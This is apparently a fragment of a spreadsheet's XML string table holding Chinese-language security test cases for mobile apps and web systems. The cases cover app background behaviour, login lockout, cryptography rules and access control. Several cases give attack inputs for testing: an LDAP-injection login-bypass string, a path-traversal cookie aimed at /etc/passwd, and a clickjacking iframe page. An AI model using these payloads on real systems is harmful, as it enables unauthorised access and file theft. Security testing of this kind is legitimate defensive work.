9.2.7 Set SSH HostbasedAuthentication to No (Scored))/9.2.9 Set SSH PermitEmptyPasswords to No (Scored)----《CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0》(P.126)</t>
  </si>
  <si>
    <t>1、产品环境可用。
2、获取产品源码。
3、获取产品文档。</t>
  </si>
  <si>
    <t>1.网络正常
2.目标系统正常</t>
  </si>
  <si>
    <t>1、app内使用的私有Activity不应配置intent-filter，如果配置了intent-filter需设置exported属性为false
2、使用默认taskAffinity
3、使用默认launchMode
4、启动Activity时不设置intent的FLAG_ACTIVITY_NEW_TASK标签</t>
  </si>
  <si>
    <t>1、使用Intent Fuzzer工具对手机的Broadcast receiver、Service、Activity组件进行Fuzz测试，看是否会出现应用程序崩溃或异常现象。 
备注：Intent Fuzzer工具对Broadcast receiver组件的扫描效果最好，Service组件扫描效果一般，只能扫描单一的Activity组件。</t>
  </si>
  <si>
    <t>1、检查应用的签名
方法一：在cmd命令行中执行jarsigner  -verify  -verbose  -certs  D:\XXX.apk
方法二：用压缩软件解压apk文件，在目录META-INF中找到文件CERT.RSA，在cmd命令行中执行：keytool  -printcert -file D:\XXX.apk\CERT.RSA</t>
  </si>
  <si>
    <t>1、LBE对应用联网进行监控（数据业务联网和wifi联网都需要监控）
2、应用存在明显本地tab页和在线tab页（比如本地音乐和在线音乐），并且进入应用后直接进入本地tab页面</t>
  </si>
  <si>
    <t>1、检查手机管家是否提示应用后台修改通话记录。如无提示，则测试通过。如有提示，需检查在手机管家提示前，应用本身是否事前提示用户后台修改通话记录（可以通过弹框的方式或者在用户协议中声明）。如无提示则测试fail
3、如果应用真正退出，则测试通过
4、LBE不会弹出后台修改通话记录提示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</si>
  <si>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4、放置15分钟，在其间进行灭屏亮屏、休眠唤醒、网络断开再连接等操作，观察LBE是否可以检测出后台读取通话记录行为</t>
  </si>
  <si>
    <t>1、应用中包含可以自动填充注册码功能的使用场景
2、LBE对后台读取短彩信行为进行监控</t>
  </si>
  <si>
    <t>1、检查LBE是否提示应用后台读取联系人。如无提示，则测试通过。如有提示，需检查在LBE提示前，应用本身是否事前提示用户后台读取联系人（可以通过弹框的方式或者在用户协议中声明）。如无提示则测试fail
3、如果应用真正退出，则测试通过
4、LBE不会弹出后台读取联系人提示</t>
  </si>
  <si>
    <t>1、首次进入应用，在用户协议界面，点击取消
2、重复步骤1的操作十次，观察LBE是否弹出后台行为提示</t>
  </si>
  <si>
    <t>1、应用包含用户协议界面
2、使用LBE监控应用的后台行为</t>
  </si>
  <si>
    <t>1.1、对于第三方应用对于勾选不勾选不做强制要求
1.2、对于是否需要有“不在提醒”这样的框遵循如下原则：（1）、可在和工信部相关的界面中存在，比如，首次的流量提醒。（2）若“用户协议”或“免责声明”中内容和工信部关注的内容，完全没有交互，则不需要有此勾选框。（3）、若某个提醒界面，每次都有提醒，则不需要额外增加 勾选框</t>
  </si>
  <si>
    <t>2、LBE不会检测到后台行为
4、LBE不会检测到后台行为</t>
  </si>
  <si>
    <t>1、首次进入应用，在用户协议界面不勾选“不再提醒”，遍历应用
2、在通知栏收到了应用更新通知后，退出应用
3、在通知栏点击更新通知启动应用</t>
  </si>
  <si>
    <t>1、应用可以从其他入口被调用（比如浏览器类应用或电话本类可以从短信中被调用、图片美化应用可以从图库中被调用等）
2、使用LBE监控应用的后台行为
3、应用没有从正常入口打开过，或者在设置中清除了应用数据</t>
  </si>
  <si>
    <t>1、系统提示该帐号已被锁定。
注：如果已经通过验证码防止帐号口令的暴力破解，那么，不强制遵循本条要求。</t>
  </si>
  <si>
    <t>手工测试+访谈：
1、检查“允许连续失败的次数”在服务器端是否可配置</t>
  </si>
  <si>
    <t>1、修改密码时，新密码有2个输入框，必须要二次输入新口令以确认没有输入错误
2、两次新口令不同的情况下不能提交成功
2、二次输入口令的对话框不能进行复制与粘贴</t>
  </si>
  <si>
    <t>人工测试：
1、在密码输入的页面，在口令输入框中全选输入的口令，尝试进行复制操作，主要场景有：
（1）注册、登陆、修改密码
（2）绑定第三方SNS、IM帐号
2、对于需要二次确认输入密码的场景，在文本中尝试粘贴，查看是否会粘贴出口令信息</t>
  </si>
  <si>
    <t>1、开发过程中使用ProGuard工具进行了代码混淆
2、反编译出来的代码，类名、变量名都是一些不可理解的内容，如aaa、bbb，则证明代码被混淆过</t>
  </si>
  <si>
    <t>1、将未签名的apk拷贝到手机
2、打开手机上的文件管理器，安装该apk</t>
  </si>
  <si>
    <t>1、“framework-res.apk没有采用华为签名” 这个只是对采用EMUI的设备有此要求
2、\\pekrnd-fs\pek01\TC_SMARTPHONE_F\ResourceFolder\Test\01 产品测试必备知识\22 手机软件&amp;业务\01_跨模块专题\16 安全组\03 主要输出\03 工具\APK签名扫描脚本</t>
  </si>
  <si>
    <t>人工测试：
1、检查资料中，是否对客户端提供的命令、参数、接口等做了说明
2、如果有隐藏的接口，检查资料中是否也对这些接口做了说明</t>
  </si>
  <si>
    <t>1.任何实际帐号都没有写死在代码中，所有账号均可管理（或可配置）；
2.不存在明显受质疑为账号的可疑字段</t>
  </si>
  <si>
    <t>访谈确认：
1、确认客户端中不存在特殊的键盘组合、鼠标敲击、访问特定URL等方式登录的途径。</t>
  </si>
  <si>
    <t>1.访问操作员的登录页面，查看是否存在验证码。
2.如果不存在验证码，则用错误的口令尝试登录多次（失败多少次触发保护由产品自行定义），看看系统是否强制必须提供验证码。
3.如果失败多次后未需要提供验证码，那么是否可以在一定时间内（时间产品自行定义）锁定帐号/IP。
产品支持以下防止Web的暴力破解的方法之一即可：
  1.登录认证提供验证码；
  2.登录失败后，提供验证码或是一定时间内（时间产品自行定义）锁定帐号。
备注：推荐使用验证码机制防暴力破解。</t>
  </si>
  <si>
    <t>1、系统运行正常
2、获取产品文档</t>
  </si>
  <si>
    <t>1、产品环境可用。
2、获取产品源码。</t>
  </si>
  <si>
    <t>1、对于数据控制者和处理者，个人数据存留期
2、对于数据控制者和处理者，超过存留期后，查看个人数据处理
3、对于数据控制者和处理者，产品运行期间临时产生的包含个人数据的文件，产品运行结束后是否自动删除或匿名化其中的个人数据
4、WIFI直连应用中，导入联系人时是否将联系人信息明文永久暴露在SD卡存储区</t>
  </si>
  <si>
    <t>由于行业标准遵从、与第三方系统对接、向下兼容性等原因，产品可支持不安全密码算法和遗留使用的密码算法，而产品新版本中必须缺省使用推荐的强密码算法。
1、禁止使用MD5、SHA-1作为数字签名的Hash算法
2、禁止使用MD5、DES、blowfish、RC4算法加密数据
3、RSA算法密钥长度不能小于2048</t>
  </si>
  <si>
    <t>1、打开系统登陆页面，看是否存在于系统或软件版本相关信息。
2、查看登陆页面源文件及登陆前提供的帮助文件，看是否存在系统及登陆相关敏感信息。
3、使用正确的账号密码登陆系统。
4、登陆成功后，页面是否有本账号的登陆信息提示（上次成功登陆的时间、ip地址；上次认证失败的时间、ip地址；自从上次登陆成功后失败的尝试次数等）。
5、登陆成功后，是否有系统相关警示信息提示用户（非法使用承担法律责任等）。</t>
  </si>
  <si>
    <t>1、重要操作的日志级别应被设置为“重要”级别
2、“修改自定义用户绑定的命令组”、“修改本地用户的用户级别”、“mod op修改其他账号密码”三个操作记录安全日志的级别应该为重要级别</t>
  </si>
  <si>
    <t>1、WIFI直连建立后，若WLAN的安全类型默认为WPA/WPA2-PSK模式，则当用户使用过时的安全协议（如wep）时，是否在显示界面或CPI资料提示风险
2、在应用程序中，配置不安全算法
3、在应用程序中，开启ftp或telnet服务</t>
  </si>
  <si>
    <t>1、终端应用程序申请不需要的权限，如：
  1) 手电筒应用申请了读取电话簿的权限
  2) 输入法申请了录音权限或摄像头的权限</t>
  </si>
  <si>
    <t>首先通过任务管理器启动mysql服务，命令行进入mysql安装目录下的bin目录，执行以下命令：
windows：mysql -u用户名 -p密码
linux：./mysql -u用户名 -p密码
1.在mysql命令行下执行“select user from mysql.user where Create_user_priv ='Y';”。
2.查询结果应该为管理员用户。</t>
  </si>
  <si>
    <t>测试思路：构造一个永远为TRUE的LDAP语句（这个场景和SQL注入很类似，用来绕过原有的检查。需要根据代码的过滤原则进行构造注入语句。下面为绕过登录的一个示例：
1.进入系统登录界面，假设Web应用程序使用过滤器来匹配 LDAP用户和密码searchlogin= "(&amp;(uid="+user+")(userPassword={MD5}"+base64(pack("H*",md5(pass)))+"))";
2.通过使用下面的值：user=*)(uid=*))(|(uid=*pass=password
过滤器搜索结果如下：searchlogin="(&amp;(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))";
该结果正确并且值总是 true 的。通过这种方法，检测人员将作为 LDAP 树型结构中的第一个用户获取已登录的状态。</t>
  </si>
  <si>
    <t>1.系统正常运行
2.系统使用LDAP技术实现应用</t>
  </si>
  <si>
    <t>1.系统运行正常
2.web系统中存在普通用户、管理员</t>
  </si>
  <si>
    <t>1.WEB系统正常运行
2.系统中存在下载链接</t>
  </si>
  <si>
    <t>1.登录系统；
2.将浏览器窗口闲置超过设置的超时时间；
3.点击任意菜单（注销和帮助菜单除外），如果不需要重新登录，说明存在问题。
备注：也可以登录Web服务器后台，查看对应的web.xml文件中的session-timeout参数的值，该值表示会话的超时时间。</t>
  </si>
  <si>
    <t>1.打开被测系统的登录页面；
2.在登录界面中输入正确的帐号、口令信息，提交登录
3.检查界面的显示信息，是否提示上次登录的IP信息，登录时间等。</t>
  </si>
  <si>
    <t>1.双击DWRDigger图标，启动DWRDigger工具。
2.点击“导入”按钮，选择要测试DWR对应的dwr.xml文件。（可以通过产品安装包，或者直接登录Web服务器，获取dwr.xml文件。）
3.配置Web应用对应的URL（形式：http://IP:端口/[Webapp]，或者http://域名/[Webapp]），例如：http://10.70.170.175:8080/tellin。
4.点击“DWR类”框中的类，自动获取DWR方法列表
5.点击“DWR方法”框中的方法，自动获取DWR方法对应的参数列表
6.以一个低权限用户登录Web服务，得到该用户的Cookie
7.在“Cookie”中输入低权限用户的有效Cookie
8.找到一个该低权限用户无权访问的功能方法
9.在“输入参数和值”框中填写输入参数值，然后点击“调用”按钮
10.在“返回结果”框中查看调用的返回结果。
备注：
1.如果了网站开启了DWR的Debug功能（通过IE可以访问到其dwr/index.html页面），则可以在Web应用URL中输入dwr/index.html对应的URL（例如：http://10.70.170.175:8080/dwr/index.html）。这时候，就不需要导入dwr.xml文件了。
2.如果需要测试Internet上的DWR类，在确保IE连接Internet的代理配置正确的情况下，点击选择“使用IE代理”。
3.如果测试的DWR类有会话管理机制，则通过代理工具获取会话标识及值，并在Cookie中配置会话标识及值，例如：JSESSIONID=0599F4FC3E64C7C673D27F296AA1450D</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.系统采用了DWR开源框架
3.测试用机上有DWRDigger软件</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.Web应用配置HTTPS</t>
  </si>
  <si>
    <t>1.被测目标系统正常运行
2.系统中存在/root/.rhosts，/root/.shosts和/etc/hosts.equiv文件</t>
  </si>
  <si>
    <t>业界标准 (DT)Req 3.01-24 如果密码作为验证属性，用户必须能够随时、独立的更改密码。
If a password is used as an authentication attribute, users must be enable to independently change the password anytime.</t>
  </si>
  <si>
    <t>红线 红线条款：
8.1.1 系统自身操作维护类口令满足“口令安全要求”。
注：系统指交付给客户运行的整体系统，包括自研的软件、软件运行的操作系统及应用服务在内。
(CIS)9.3.1 Set Password Creation Requirement Parameters Using pam_cracklib (Scored)----《CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0》(P.132)</t>
  </si>
  <si>
    <t>1.通过访谈或其他分析方式，分析系统中都有哪些地方涉及使用存储加密密钥和通信加密密钥。
2.获取源码文件。</t>
  </si>
  <si>
    <t>1、手动将要测试的APK放入对应的huaweiApks或者thirdPartyApks文件夹，华为自研应用放入huaweiApks文件夹，第三方应用放入thirdPartyApks文件夹
2、运行 check_perm.py</t>
  </si>
  <si>
    <t>该行为对应权限android.permission.CALL_PHONE
android.permission.CALL_PRIVILEGED
如果有明显拨打电话的按钮或文字说明则不算后台行为</t>
  </si>
  <si>
    <t>1、检查手机管家是否提示应用后台删除通话记录。如无提示，则测试通过。如有提示，需检查在手机管家提示前，应用本身是否事前提示用户后台删除通话记录（可以通过弹框的方式或者在用户协议中声明）。如无提示则测试fail
3、如果应用真正退出，则测试通过
4、LBE不会弹出后台删除通话记录提示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</si>
  <si>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4、放置15分钟，在其间进行灭屏亮屏、休眠唤醒、网络断开再连接等操作，观察LBE是否可以检测出后台修改通话记录行为</t>
  </si>
  <si>
    <t>1、检查手机管家是否提示应用后台修改联系人。如无提示，则测试通过。如有提示，需检查在手机管家提示前，应用本身是否事前提示用户后台修改联系人（可以通过弹框的方式或者在用户协议中声明）。如无提示则测试fail
3、如果应用真正退出，则测试通过
4、LBE不会弹出后台修改联系人提示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</si>
  <si>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4、放置15分钟，在其间进行灭屏亮屏、休眠唤醒、网络断开再连接等操作，观察LBE是否可以检测出后台读取联系人行为</t>
  </si>
  <si>
    <t>1、手机恢复出厂设置或者升级后第一次开机
2、使用LBE监控应用的后台行为</t>
  </si>
  <si>
    <t>2、正常，默认是否勾选不作强制要求
2-1、再次进入应用不在弹出用户协议
2-2、再次进入应用还会弹出用户协议
3、用户协议必须要做成每次都提醒。无论选择同意还是拒绝（只是第一次打开有用户协议，后续再打开不提示用户协议就为问题）</t>
  </si>
  <si>
    <t>1、首次进入应用，在用户协议界面不勾选“下次不再提醒”，点击确认后正常进入应用并退出
2、再次进入应用，使用LBE检查用户协议界面是否有后台行为
3、重复步骤1
4、重启手机，再次进入应用，使用LBE检查用户协议界面是否有后台行为</t>
  </si>
  <si>
    <t>1、应用本身设置了应用更新通知
2、应用存在用户协议
3、使用LBE监控应用的后台行为</t>
  </si>
  <si>
    <t>1、锁定时长可配置：取值范围：0-999（可根据实际场景确定） 分钟，当取值为 0 时，表示无限期锁定，建议默认：30 分钟（可根据实际场景确定）。
注：除非客户实际需求或者很合理的业务设计，不建议无限期锁定。</t>
  </si>
  <si>
    <t>预置条件：
1、系统提供“连续登录失败锁定”功能；
2、系统提供的连续错误登录次数为N（N&lt;10）
测试步骤：
1、连续N-1次使用错误的口令登录使帐号锁定；
2、使用另一个账号口令正常登录业务系统并退出；
3、使用步骤1中的账号再次错误登录
4、使用另外一台机器，尝试登录步骤1中的账号</t>
  </si>
  <si>
    <t>人工测试：
1、进入修改密码的页面，进行修改密码的操作
1、新口令必须输入两次，两次新口令不一致的情况下是否提示错误</t>
  </si>
  <si>
    <t>1、使用Proguard技术对代码进行混淆，包括：类名混淆、变量名和函数名混淆等
2、或者使用全反射调用
注：proguard是一个java代码混淆的工具，通过proguard，别人即使反编译你的apk包，也只会看到一些让人很难看懂的代码，从而达到保护代码的作用</t>
  </si>
  <si>
    <t>人工测试 + 访谈确认：
1、确认Android的应用在进行编译/打包过程中，是否利用ProGuard工具执行代码混淆。
2、使用dex2jar工具，将dex文件转换为jar包
3、Java：使用Java Decomplier工具将jar包反编译
.NET：使用.NET Reflector反编译.NET程序
Delphi：使用DeDe反编译Delphi程序
4、查看反编译的代码是否进行了混淆</t>
  </si>
  <si>
    <t>1、应用不允许在未经用户同意的情况下自动升级
2、安全红线1.7中要求“在线升级检查升级包更新的频率不能过于频繁，不能多于1次/天”</t>
  </si>
  <si>
    <t>1、采用EMUI的设备无需测试本用例
2、服务器路径：\\pekrnd-fs\pek01\TC_SMARTPHONE_F\ResourceFolder\Test\06 测试资源\09 APK资源\手机安全Security\AndroidSigned.apk</t>
  </si>
  <si>
    <t>1、应用运行前，关闭各个无线端口（wifi，BT，wifi热点，蓝牙共享网络，Wif direct,GPS等）
2、应用运行使用10分钟，再次查看无线端口状态</t>
  </si>
  <si>
    <t>1、所有的命令、参数、接口（含处于隐藏模式下的命令、参数、生产调测接口）必须在在产品资料中公开或受限公开。
备注：
1、在客户端中，Portal需要更关注本条红线，主要检查是否有相关的资料
2、资料一般随解决方案发布，关注解决方案资料中是否有相关内容</t>
  </si>
  <si>
    <t>访谈确认：
1、确认客户端中不存在特殊的账户（隐藏账户），使得能够使用该账户登录客户端完成操作
2、检查资料是否对所有账号有详细说明</t>
  </si>
  <si>
    <t>1、设备维修、销毁需要移出网络或云资源回收场景，检查是否提供了安全删除个人数据的机制，并检查利用此机制是否能够完全删除包含的个人数据。
2、检查删除个人数据时，是否只是简单删除文件的逻辑标志
3、在没有提供安全删除机制时，是否提供了安全删除的指导</t>
  </si>
  <si>
    <t>1.检查Web根目录是否存在robots.txt文件，如果不存在测试结束；
2.如果存在，检查robots.txt文件是否存在Web后台、文件上传等敏感文件，如果存在，说明存在问题。</t>
  </si>
  <si>
    <t>1、 已知Web网站地址。
2、 Web业务正常运行。
3、 如果是IE浏览器，在Internet选项-&gt;高级里把“显示友好HTTP信息”去掉选择状态。
4、 已知待测目标URL，假设为http://www.exmaple.com/page.xxx
待测目标存在参数输入，假设为name=value，即：
http://www.exmaple.com/page.xxx?name= value。</t>
  </si>
  <si>
    <t>1、使用管理员账号登陆系统。
2、尝试执行重启设备、格式化存储空间等危险操作。
3、看是否提示用户操作的危险性，并要求用户重新输入验证口令。</t>
  </si>
  <si>
    <t>1、页面显示“Website is vulnerable to clickjacking!”，且目标网站“www.baidu.com”加载成功，说明存在漏洞。
2、页面显示“Website is vulnerable to clickjacking!”，目标网站加载不成功，说明网站存在一定的保护措施。</t>
  </si>
  <si>
    <t>1、不允许使用公开的用于调试目的的私钥（如：Android Debug签名私钥）对软件进行签名
2.对华为开发的软件进行完整性签名时，必须使用华为颁发的代码签名证书对应的私钥进行签名
3、若使用第三方私钥对软件应用进行签名，须确认该私钥的来源是可信的，如来自业界可信的CA中心（veriSign）或公司（如微软等）</t>
  </si>
  <si>
    <t>1、禁止使用C标准库函数random()、rand()生成随机数用于安全用途
2、禁止使用Java的java.util.Random类生成随机数用于安全用途
3、禁止每次调用随机数接口时都设置相同的种子，推荐只在进程初始化的时候设置一次
4、使用java.security.SecureRandom()产生随机数时，禁止每次都设置了相同的种子，这将导致每次启动后产生的随机数都一样（若使用java.security. Secure Random()时出现阻塞，消减方案请参考《熵源不足情况下产生安全随机数的解决方案》（待发布））</t>
  </si>
  <si>
    <t>问题1（致命）：Sophia-10L中/system/bin目录下存在以下几个测试文件，test_modem_boot、test_rtc、testpcsc、testpcsc_sendapdu，以上文件uid都为ROOT，且全局可执行。其中testpcsc_senapdu文件具有和sim卡通信的功能，可直接向sim卡发送apdu命令，即可以任意进行修改PIN码、锁住SIM卡、获取SIM卡储存内容等操作。任意应用也可以通过shell命令调用的方式来执行该操作。
问题2（提示）：硬盘框、SOD操作系统中含有gdb调试工具。
问题3（提示）：系统中含有网络嗅探工具tcpdump，tcpdump可以捕捉到用户敏感信息：比如短信、彩信、终端位置信息等。
问题4（提示）：系统中保留有cpp、gcc、python等开发和编译工具，以及tcpdump等网络嗅探类的工具风险：扩大了攻击面，存在安全风险。</t>
  </si>
  <si>
    <t>1、ssl删除成功的话，继续步骤2；ssl证书删除失败的话，用例终止
2、具体的ssl应用异常，wireshark抓包不包含明文的敏感信息</t>
  </si>
  <si>
    <t>首先通过任务管理器启动mysql服务，命令行进入mysql安装目录下的bin目录，执行以下命令：
windows：mysql -u用户名 -p密码
linux：./mysql -u用户名 -p密码
1.在mysql命令行下执行“select user from mysql.user where Reload_priv ='Y';”。
2.查询结果应该为管理员用户。</t>
  </si>
  <si>
    <t>1.在系统中可输入字符的输入框中尝试输入大量的闭括号：））））））如果发生错误，刚应用程序易于受到LDAP注入
2.尝试输入干扰不同类型的查询表达式，检查是否可以通过这些表达式来影响返回结果。如：)(cn=*;*))(|(cn=*;*))%00</t>
  </si>
  <si>
    <t>1.系统正常运行
2.系统使用LDAP技术实现认证功能</t>
  </si>
  <si>
    <t>1、利用mantra portal打开该类灰色按键/页面元素所在的普通用户页面
2、在页面代码中将对应的按键/页面源代码改为可用，如DISABLE修改为ENABLE
4、正常使用此按键/页面元素,查看服务器是否响应普通用户的越权请求。</t>
  </si>
  <si>
    <t>1.系统运行正常
2.设置普通用户、管理员
3.web系统采用action、dwr等方式访问</t>
  </si>
  <si>
    <t>1.登录系统后，发送请求
2.检查是否有可能确定 Web 应用程序网页 / 模板动态生成所使用的 Cookie，使用../ 进行路径遍历测试：
如：
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd</t>
  </si>
  <si>
    <t>1.系统正常运行
2.已知系统用户名与密码
3.存在下载功能</t>
  </si>
  <si>
    <t>1.登录系统；
2.使用Web代理工具拦截登录后的请求消息；
3.检查请求消息当中的Cookie是否包括与时间相关信息，如登录时间，以及过期时间。</t>
  </si>
  <si>
    <t>1.系统运行正常
2.已知正确的用户名、口令
3.系统如果存在超时机制，设置相应的超时时间</t>
  </si>
  <si>
    <t>任何实际帐号都没有写死在代码中，所有账号均可管理（或可配置）；
备注：该用例的测试结果必须包含扫描结果和分析结果。</t>
  </si>
  <si>
    <t>1.使用系统管理员帐号登录系统
2.访问系统的锁定操作员帐号的界面，锁定某操作员帐号（假设operator1）；
3.修改操作系统的时间，使日期往后调整2天；
4.在尝试以operator1登录系统。
5.重新登录系统查看帐户是否存在，或者访问数据库，检查操作员表是否还存在operator1的帐号。</t>
  </si>
  <si>
    <t>1.打开被测系统的登录页面；
2.在登录界面中输入正确的帐号、口令信息，提交登录
3.使用系统转账、余额转移、支付等重要交易，完成整个交易流程，是否有二次认证措施，例如重新输入密码认证。
备注：
1.密码重新认证就是让用户重新输入用户密码或动态口令（如动态密码卡产生的密码或短信随机验证码等）、服务器端再次就密码进行认证。
2.重要事务还应该包括对系统的进程重新启动，重要业务数据配置等，产品应该根据业务场景识别需要二次认证的场景。</t>
  </si>
  <si>
    <t>1.Web系统采用的Web容器配置与公司发布的规范一致
2.Web系统采用的Web容器配置与公司发布的规范不一致的地方没有引入安全风险</t>
  </si>
  <si>
    <t>红线 红线条款：
8.1.1 系统自身操作维护类口令满足“口令安全要求”。
注：系统指交付给客户运行的整体系统，包括自研的软件、软件运行的操作系统及应用服务在内。</t>
  </si>
  <si>
    <t>1、使用SecureCat工具扫描操作系统，确认检查项
9.2.1 Set SSH Protocol to 2 (Scored)是否pass
9.2.3 Set Permissions on /etc/ssh/sshd_config (Scored)是否pass
9.2.5 Set SSH MaxAuthTries to 4 or Less (Scored))是否pass
9.2.6 Set SSH IgnoreRhosts to Yes (Scored)是否pass
9.2.7 Set SSH HostbasedAuthentication to No (Scored))是否pass
9.2.9 Set SSH PermitEmptyPasswords to No (Scored)是否pass</t>
  </si>
  <si>
    <t>禁止使用私有算法实现加解密，包括：
1. 自行定义的通过变形/字符移位/替换等方式执行的数据转换算法。
2. 用编码的方式（如Base64编码）实现数据加密的目的的伪加密实现。
子检查项：
1、禁止使用自行设计的密码算法或使用未公开算法细节的算法；
2、禁止自行对标准密码算法进行改造并使用；
3、禁止使用自行定义的通过变形/字符移位/替换等方式执行的数据转换；
4、禁止使用编码的方式（如Base64编码）实现数据加密目的；
5、禁止使用差错控制编码（如奇偶校验、CRC）实现完整性校验。</t>
  </si>
  <si>
    <t>检查源代码，加密密钥不能硬编码到代码中。
加密密钥：敏感数据加密的密钥，通信加密密钥。</t>
  </si>
  <si>
    <t>1.通过burpsuite拦截的http请求中不包含用户角色和权限信息，必须在服务器校验
2.服务器返回未认证的提示</t>
  </si>
  <si>
    <t>1、exported属性明确定义
2、私有service不定义intent-filter并且设置exported为false
3、公开的service设置exported为true,intent-filter可以定义或者不定义
4、内部/合作service设置exported为true，intent-filter不定义
5、只被应用本身使用的service应设置为私有
6、合作service需对合作公司的app签名做校验
7、不应在service创建(onCreate方法被调用)的时候决定是否提供服务,应在onStartCommand/onBind/onHandleIntent等方法被调用的时候做判断</t>
  </si>
  <si>
    <t>1.运行应用XXX
2.在cmd命令行输入adb shell
3.输入ps命令
4.在最后一列NAME中，找到此应用，查看该应用对应的USER列显示的运行权限</t>
  </si>
  <si>
    <t>1、PC已安装Python
2、PC已通过adb连接到被测设备
3、将APK权限扫描脚本的ApkPermissionTest目录整个拷贝到D盘根目录
4、安装xlrd：进入命令行，定位到ApkPermissionTest里面的xlrd-0.9.2目录，运行：python setup.py install
5、将权限汇总表拷贝到D:\ApkPermissionTest目录下，并重命名为《安全红线测试--各个apk的权限申请总表.xlsx》</t>
  </si>
  <si>
    <t>1、检查LBE是否提示应用后台拨打电话。如无提示，则测试通过。如有提示，需检查在LBE提示前，应用本身是否事前提示用户后台拨打电话（可以通过弹框的方式或者在用户协议中声明）。如无提示则测试fail
3、如果应用真正退出，则测试通过
4、LBE不会弹出后台拨打电话提示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</si>
  <si>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4、放置15分钟，在其间进行灭屏亮屏、休眠唤醒、网络断开再连接等操作，观察LBE是否可以检测出后台删除通话记录行为</t>
  </si>
  <si>
    <t>1、桌面launcher类app读取短彩信无需提醒
2、该行为对应权限android.permission.READ_SMS
android.permission.RECEIVE_SMS
android.permission.RECEIVE_MMS</t>
  </si>
  <si>
    <t>1、检查手机管家是否提示应用后台删除联系人。如无提示，则测试通过。如有提示，需检查在手机管家提示前，应用本身是否事前提示用户后台删除联系人（可以通过弹框的方式或者在用户协议中声明）。如无提示则测试fail
3、如果应用真正退出，则测试通过
4、LBE不会弹出后台删除联系人提示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</si>
  <si>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4、放置15分钟，在其间进行灭屏亮屏、休眠唤醒、网络断开再连接等操作，观察LBE是否可以检测出后台修改联系人行为</t>
  </si>
  <si>
    <t>1、用户协议描述清晰无异议、重点权限描述醒目，不会误导用户（不要把权限申明部分设置为部分滚动、要把工信部关心的关键权限申明放到权限申明的开头让用户一眼看到等）
2、用户协议描述行为与实际一致。比如用户协议描述使用某个号码发送注册短信，描述的号码需要和实际的号码一致</t>
  </si>
  <si>
    <t>1、观察用户协议中是否有“不在提醒”选项 
2、有“不在提醒选项”，
2-1、有“不在提醒选项”，选择勾选，在选择同意然后再次进入应用
2-2、有“不在提醒选项”，选择勾选，在选择拒绝然后再次进入应用
3、无“不在提醒选项”</t>
  </si>
  <si>
    <t>1、应用存在用户协议
2、使用LBE监控应用的后台行为</t>
  </si>
  <si>
    <t>1、锁定时长过后，可以正常登录。
注：自动解锁和管理员手动解锁二者有其一就满足红线</t>
  </si>
  <si>
    <t>手工测试+访谈：
1、检查“锁定时长”在服务器端是否可配置</t>
  </si>
  <si>
    <t>1、修改密码界面没有输入用户名的地方
2、终端软件应该只能修改当前登录用户的密码，试图修改其他账号的密码时，修改失败</t>
  </si>
  <si>
    <t>人工测试：
1、进入修改密码的页面，进行修改密码的操作，分如下几种场景测试：
（1）只输入新口令，不输入旧口令
（2）输入错误的旧口令，且输入了新口令</t>
  </si>
  <si>
    <t>1、利用apktool解压apk文件
2、对其smali文件的文件名进行分析，如果存在一个或以上的资源的smali文件，就可以证明该apk文件没有混淆，反之，则说明已经是混淆过了的文件
3、如果是全反射调用，直接判断是否存在forname函数。
注：代码混淆不能避免反编译攻击，但是会大大提高反编译难度
其他方法：要防破解，还使用NDK，用C、C++写的代码，用NDK编成So库，用JNI进行调用</t>
  </si>
  <si>
    <t>使用DSA算法签名，当r等于0时签名可以被轻易地伪造，当s等于0时攻击者可以通过对算法逆向得到私钥，所以必须对DSA的签名结果进行检查以防止上述攻击。通过源代码分析，检查DSA算法使用时，用于签名的r和s两个大整数的值均不为0值：
1、如果使用iPSI执行DSA签名，有调用iPsiDsaSig_decode函数从签名结果中解析出r和s并判断它们值是否为0，当为0值时有重新生成r和s；
2、如果使用OpenSSL执行DSA签名，有调用d2i_DSA_SIG函数从签名结果中解析出r和s并判断它们是否为0，当为0值时有重新生成r和s；
3、如果使用JDK执行DSA签名，有使用第三方开源的Bouncy Castle中的ASN1Sequence类（或其它等效方法）从签名结果中解析出r和s并判断它们是否为0，当为0值时有重新生成r和s；</t>
  </si>
  <si>
    <t>1.密码算法可配置，或者记录在配置文件里，有多个安于密码算法选项，则认为是安全；
2.加算算法参数没有在代码中固定写死，加密算法选项提供了多个选择，则认为是安全的；
3、存在加密算法选项或者参数的配置文件在使用时会地完整性校验，或者有相应的访问权限控制，则认为是安全的；</t>
  </si>
  <si>
    <t>访谈确认：
1、确认在代码中是否存在用户无法修改的口令（硬编码的口令），使得可以使用这些口令来登陆客户端，查看其他用户的数据等
2、检查资料是否提供口令修改说明</t>
  </si>
  <si>
    <t>1、不存在用户未知的帐户
2、产品资料中提供所有账号及管理操作说明。</t>
  </si>
  <si>
    <t>1、存在个人数据安全销毁机制
2、或提供了安全删除的指导</t>
  </si>
  <si>
    <t>若产品仅发国内，此条与工信部录音权限检查项重合，此条不用测试
若产品发货地区包含国外，此条用例需要测试</t>
  </si>
  <si>
    <t>不存在跨站脚本漏洞。
备注：需要对页面上所有可以提交参数的地方进行测试。具体跨站脚本的测试语句根据实际情况的不同而不同，这里列出了一些最常见构造语句。
AppScan可以找出扫描到的页面的绝大部分跨站脚本漏洞，但对没有扫描到的网页就无能为力了。</t>
  </si>
  <si>
    <t>1、在web服务器上新建一个包含iframe标签的简单页面（example.html），页面HTML源码如下：
&lt;html&gt;
   &lt;head&gt;
     &lt;title&gt;Clickjack test page&lt;/title&gt;
   &lt;/head&gt;
   &lt;body&gt;
     &lt;p&gt;Website is vulnerable to clickjacking!&lt;/p&gt;
     &lt;iframe src="http://www.baidu.com" width="500" height="500"&gt;&lt;/iframe&gt;
   &lt;/body&gt;
&lt;/html&gt;
2、使用浏览器访问example.html，查看页面显示内容。</t>
  </si>
  <si>
    <t>1、密钥自动更新过程中，密钥加密传输。
2、密钥更新作为涉及产品安全性的重要功能，不论成功或失败都应上报相应级别的日志或告警。</t>
  </si>
  <si>
    <t>问题1（一般）：代码中设置固定的公网ip:77.222.90.3，该IP归属地为荷兰.
